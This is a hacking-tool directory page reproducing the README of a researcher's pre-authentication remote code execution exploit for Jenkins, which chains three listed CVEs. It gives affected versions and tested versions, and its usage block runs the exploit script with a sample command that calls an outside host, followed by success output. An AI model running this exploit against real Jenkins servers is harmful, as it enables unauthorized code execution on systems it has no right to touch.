Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
awesome-jenkins-rce-2019 — There is no pre-auth RCE in Jenkins since May 2017, but this is the one! | Kitploit
Tools/GitHubGitHub/orangetw/awesome-jenkins-rce-2019
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHuborangetw/awesome-jenkins-rce-2019

awesome-jenkins-rce-2019

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

View Repository
61012727 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

awesome-jenkins-rce-2019

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Affect list

  • ANONYMOUS_READ disable

    • Jenkins version < 2.138
  • ANONYMOUS_READ enable(or with a normal user account)

    • Jenkins build time < 2019-01-28

Usage

root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Acknowledgements

  • @orange_8361 for CVE-2018-1000861
  • @0ang3el for CVE-2019-1003005
  • @webpentest for CVE-2019-1003029

Part slides from my HITB AMS 2019 talk:

1.png 2.png 3.png

References

  • Hacking Jenkins Part 1 - Play with Dynamic Routing
  • Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
  • Jenkins Security Advisory 2018-12-05
  • Jenkins Security Advisory 2019-01-28
  • Jenkins Security Advisory 2019-03-06
Download Tool